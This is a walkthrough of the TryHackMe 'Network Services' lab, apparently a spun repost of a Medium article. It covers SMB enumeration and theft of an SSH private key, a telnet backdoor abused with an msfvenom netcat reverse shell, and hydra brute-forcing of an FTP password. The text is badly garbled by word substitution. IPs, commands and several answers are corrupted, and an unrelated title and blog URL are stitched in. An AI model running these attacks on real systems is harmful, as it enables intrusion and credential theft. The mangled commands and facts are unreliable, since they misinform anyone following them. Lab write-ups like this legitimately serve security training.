Em Client Mark as Read When Opened

TryHackMe: Network Services Room Writeup

The room: Larn about, then enumerate and exploit a variety of network services and misconfigurations. https://tryhackme.com/room/networkservices

Chore 2: Understanding SMB

All the answers are found in the chore clarification.

What does SMB stand for?

server bulletin block

What type of protocol is SMB?

response-request

What do clients connect to servers using?

tcp/ip

What systems does Samba run on?

unix

Task iii: Enumerating SMB

From this chore on is where the fun starts! Offset, let's setup the env var to make the following commands easier.

          export ip=10.10.0.0 # alter it to your target motorcar'southward ip        

Conduct an nmap browse of your choosing, How many ports are open up?

Permit's run an nmap scan. As a reminder, these are what the flags mean:

• -sV: service/version scan
• --script vuln: run a script browse with the vuln scripts.
• -oN nmap-$ip.out: output in normal format to the file

          nmap -sV --script vuln -oN nmap-$ip.out $ip        

Now to check for open ports from the scan results.

          cat nmap-$ip.out | grep open        

I spy with my little eye.. 3 open ports

3

What ports is SMB running on?

From the same output above, we can come across the 2 Samba services.

139/445

Let'south get started with Enum4Linux, conduct a full bones enumeration. For starters, what is the workgroup proper name?

There seems to be no man page for enum4linux, just we can do enum4linux -h to see the flags.

option* (and for some reason the task description lists it as -A)

So permit'south run a -a browse. There's no flag to write to file, so allow's utilize tee to practise that. This volition take about 1 min to run.

          enum4linux -a $ip | tee enum4linux-$ip.out        

One time you reach the end, or this line below, nosotros can cancel the process with Ctrl-C: [+] Enumerating users using SID S-1–22–1 and logon username '', password ''. Now permit's leisurely read the output to find the answers.

          less enum4linux-$ip.out        

The workgroup name is under the section "Enumerating Workgroup/Domain…"

workgroup

What comes up equally the proper noun of the automobile?

The hint says to look under OS data, there aren't really any labels, so information technology'southward easy to miss.

polosmb

What operating system version is running?

This is in the same place equally the machine proper name, this time it'due south labelled!

six.1

What share sticks out as something we might want to investigate?

Allow'southward look further down at the "Share Enumeration…" section. Here is a list of share names.

I was really more interested in the netlogon share, but oh wells..

profiles

Task iv: Exploiting SMB

What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.ten.10.2 on the default port?

The format is given in the task clarification. The tricky part is the port. Since we want to use the default port, the -p flag is not needed.

smbclient //10.10.10.two/secret -U arrange

Does the share permit anonymous access? Y/N?

This directly follows the example syntax to a higher place, we only need to supersede with dissimilar values. Those values are given in the task description (recollect we're interested in the profiles share. and so let's run this:

          smbclient //$ip/profiles -U Anonymous        

A password prompt will appear, simply the job clarification tells us not to supply a password, so just hit Enter.

y

Keen! Have a look around for whatsoever interesting documents that could contain valuable information. Who can we presume this profile folder belongs to?

Now that we're in the smb console, nosotros accept but limited commands. Blazon assist to see what they are. We're looking for interesting documents, so let's ls.

Really everything looks interesting to me..

Permit'south check out the simply non-hidden document with more.

          more "Working From Domicile Information.txt"        

Such a dainty company to work for..

john cactus

What service has been configured to allow him to work from home?

We can glean this from the file we were simply snooping on.

ssh

Okay! At present we know this, what directory on the share should we await in?

ssh is associated with an .ssh binder, and then that's our adjacent destination.

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and and so admission, a server. Which of these keys is most useful to us?

          cd .ssh
ls        

The standard key-pair is present. id_rsa is the private key, id_rsa.pub is the public fundamental. The almost useful is definitely the private fundamental.

id_rsa

What is the smb.txt flag?

The smb.txt file is on the main server. Nosotros're going to have to access that at present. We'll grab John's keys and use that to ssh into the main server.

Permit's download both keys to our machine!

          mget id_rsa*        

Next, open another terminal window and copy both keys into our auto's .ssh (mkdir if information technology's non present). Then change permissions on the private key.

          chmod 600 id_rsa        

Now we tin can attempt to ssh into the master server! Before that, check the id_rsa.pub file to find the username at the end of the file.

          ssh cactus@$ip        

Quick troubleshoot:

• Load key "/home/kali/.ssh/id_rsa": bad permissions: revisit chmod pace
• load pubkey "/home/kali/.ssh/id_rsa": invalid format: download/copy the public fundamental into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub

Chore five: Understanding Telnet

All the answers are plant in the task clarification.

What is Telnet?

awarding protocol

What has slowly replaced Telnet?

ssh

How would you connect to a Telnet server with the IP 10.10.ten.3 on port 23?

telnet 10.x.10.three 23

The lack of what, ways that all Telnet communication is in plaintext?

encryption

Task 6: Enumerating Telnet

Set the env var once again since the machine inverse, so run the scan! This will take a while to run.

          export ip=x.10.0.0 # change it to your target motorcar's ip
nmap -A -oN nmap-$ip.out -p- $ip        

How many ports are open on the target machine?

Nosotros can go the information for the next few questions from searching for open

          true cat nmap-$ip.out | grep open        

ane

What port is this?

8012

This port is unassigned, merely nonetheless lists the protocol it's using, what protocol is this?

tcp

Now re-run the nmap scan, without the -p- tag, how many ports prove up as open?

Run the scan again without -p-, let'due south output into another file, then search for open again. At that place will nothing returned.

          nmap -A -oN nmap-$ip-2.out $ip
true cat nmap-$ip-2.out | grep open        

0

Based on the title returned to us, what do we call back this port could be used for?

Looking back at the original scan results, we tin can find a line that tells u.s.a. the reply to the next few questions.

a backdoor

Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy

Task 7: Exploiting Telnet

Great! It's an open up telnet connection! What welcome bulletin do we receive?

Our next pace is to effort opening a telnet connection. Install it if not present. The port used by telnet is custom, we really saw it earlier while scanning the machine. Once nosotros go far, we'll see a welcome message.

          sudo apt install telnet
telnet $ip 8012        

At least they were honest..

SKIDY'Southward BACKDOOR.

Allow's try executing some commands, do nosotros get a return on whatsoever input nosotros enter into the telnet session? (Y/Northward)

Based on the welcome bulletin, we know to use .Aid to cheque for bachelor commands.

Then, try doing a .RUN. There are no return values nor acknowledgement.

n

At present, use the command "ping [local tun0 ip] -c one" through the telnet session to see if we're able to execute arrangement commands. Exercise we receive any pings? Note, you need to preface this with .RUN (Y/N)

In some other terminal session, run ifconfig and bank check for our local ip under tun0. For convenience salvage it to an env var.

          ifconfig
export lhost=ten.9.0.0 # change it to your machine's ip        

In the same concluding, run tcpdump co-ordinate to the task description.

          sudo tcpdump ip proto \\icmp -i tun0        

Then dorsum to the telnet session, run a ping to your machine, following the task clarification.

          .RUN ping 10.ix.0.0 -c 1 # replace with your car's ip        

Check the last session running the tcpdump. There should exist 2 logs, this means that the ping from the target auto to our machine succeeded, and implies we are able to execute system commands.

y

We're going to generate a reverse shell payload using msfvenom. What discussion does the generated payload first with?

We don't need tcpdump anymore, and then kill it. Let's gear up the lport env var for convenience (we take set lhost earlier). Then run msfvenom post-obit the syntax in the task clarification to generate the payload.

          consign lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R        

The final line is the payload. Information technology'southward basically a command that starts with mkfifo and uses netcat.

mkfifo

What would the control look like for the listening port we selected in our payload?

The syntax is in the task clarification. These are what the flags mean:

• -l: listen style, for inbound connects
• -v: verbose
• -p: specify the local port (in our case, the port we are listening to)

nc -lvp 4444

Success! What is the contents of flag.txt?

Offset run the netcat command to listen to our lport.

          nc -lvp $lport        

Then in the telnet session, run the payload generated by msfvenom before (basically re-create/paste entire last line into the telnet session).

Once the payload is run, the netcat session from before will respond. We now have a reverse shell to the target! Nosotros can use this netcat session to send commands to the target motorcar. Run ls to go a list of files, nosotros volition come across flag.txt. Print out the contents and nosotros're done here!

Task 8: Understanding FTP

Most the answers are found in the chore description.

What communications model does FTP employ?

We can find this info in the task description.

client-server

What'south the standard FTP port?

We tin can observe this past googling around.

21

How many modes of FTP connection are at that place?

The active way the and passive manner

2

Task 9: Enumerating FTP

How many ports are open on the target machine?

Permit'due south do our usual scan on this machine, this will accept a while.

          export ip=10.10.0.0 # modify it to your target auto's ip            
nmap -sV -oN nmap-$ip.out $ip
cat nmap-$ip.out | grep open        

two

What port is ftp running on?

21

What variant of FTP is running on it?

vsftpd

What is the name of the file in the anonymous FTP directory?

Login following the instructions from the task description. We can utilise help to view bachelor commands. Then employ ls to listing the files.

PUBLIC_NOTICE.txt

What do we think a possible username could be?

Let's snoop on the notice!

          go PUBLIC_NOTICE.txt -        

mike

Chore x: Exploiting FTP

What is the countersign for the user "mike"?

Say bye to ftp for now, and so run the control from the chore description with our user.

          hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $ip ft        

Mike should've tried but a fleck harder

password

What is ftp.txt?

Now that nosotros've got Mike's password, let's repeat the steps and endeavour to get to the file.

          ftp $ip
mike
countersign
ls
get ftp.txt -        

hicksthengs.blogspot.com

Source: https://medium.com/dont-code-me-on-that/tryhackme-network-services-room-writeup-e00f88b7b599

Share this post